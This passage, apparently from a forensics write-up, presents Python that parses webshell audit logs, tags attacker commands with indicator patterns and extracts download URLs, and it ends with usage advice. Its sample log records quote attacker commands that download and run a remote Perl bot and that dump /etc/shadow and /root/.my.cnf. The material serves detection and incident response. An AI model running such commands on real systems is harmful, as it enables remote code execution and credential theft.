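    "recon": r"\b(?:id|whoami|uname|hostname|ifconfig|netstat|ls)\b",
    "file-edit": r"^(?:edit_file|save_file)$",
}


def tag_command(cmd):
    """Return the sorted list of indicator names whose pattern matches the command."""
    return sorted(tag for tag, pat in INDICATORS.items() if re.search(pat, cmd))


def parse_webshell_log(text):
    """Split the audit log on its underscore separators and parse each record."""
    entries = []
    for chunk in re.split(r"_{20,}", text):
        m = ENTRY_RE.search(chunk)
        if not m:
            continue
        e = m.groupdict()
        try:
            e["when"] = parsedate_to_datetime(e["day"])  # RFC 2822 date, keeps the offset
        except (TypeError, ValueError):
            e["when"] = None
        e["tags"] = tag_command(e["cmd"])
        entries.append(e)
    return entries


def extract_urls(entries):
    """Unique URLs the attacker pulled files from: immediate indicators to block and hunt for."""
    urls = []
    for e in entries:
        for u in re.findall(r"https?://[^\s;'\"]+", e["cmd"]):
            if u not in urls:
                urls.append(u)
    return urls


def find_audit_logs(docroot):
    """Yield paths of candidate webshell audit logs under a document root."""
    for dirpath, _, files in os.walk(docroot):
        for name in files:
            if name in AUDIT_LOG_NAMES:
                yield os.path.join(dirpath, name)


# Sample records copied from Examples 1 and 2 above, laid out one field per line
# (the layout is an assumption; the parser also accepts the run-together form).
SAMPLE_X_TXT = """Day  : Mon, 03 Jun 2013 22:05:39 -0300
IP  : 188.83.6.147
Browser  : Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Url  : /wp-content/themes/sakura/plugins/woo-tumblog/functions/cache/03e91508ab1a6811d2e16df4081c4b36.php
Last Command : id
_____________________________________________________________________________________
Day  : Mon, 03 Jun 2013 22:05:52 -0300
IP  : 188.83.6.147
Browser  : Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Url  : /wp-content/themes/sakura/plugins/woo-tumblog/functions/cache/03e91508ab1a6811d2e16df4081c4b36.php
Last Command : wget http://mail.ebsuccess.com/accounts/inc/bot1.txt; perl bot1.txt; rm -rf bot1.txt
_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 19:41:24 -0500
IP      : 67.202.92.84
Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Url     : /wp-master.php
Last Command : hostname ; /sbin/ifconfig | grep inet ; cat /etc/passwd /etc/shadow /root/.my.cnf /etc/group ; ls -alF /etc/passwd /etc/shadow /root/.my.cnf /etc/group
_____________________________________________________________________________________
"""

if __name__ == "__main__":
    entries = parse_webshell_log(SAMPLE_X_TXT)
    for e in entries:
        when = e["when"].isoformat() if e["when"] else e["day"]
        print(f'{when}  {e["ip"]:<15}  {",".join(e["tags"]) or "-":<26}  {e["cmd"]}')
    print("download URLs:", extract_urls(entries))
```

On a live case, run parse_webshell_log over every file find_audit_logs returns and sort the combined entries by "when": the result is a command timeline with source IPs and User-Agents, which the attacker's edits to access_log cannot erase. The Url field also tells you where the backdoor itself lives, which is the file to pull for analysis.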
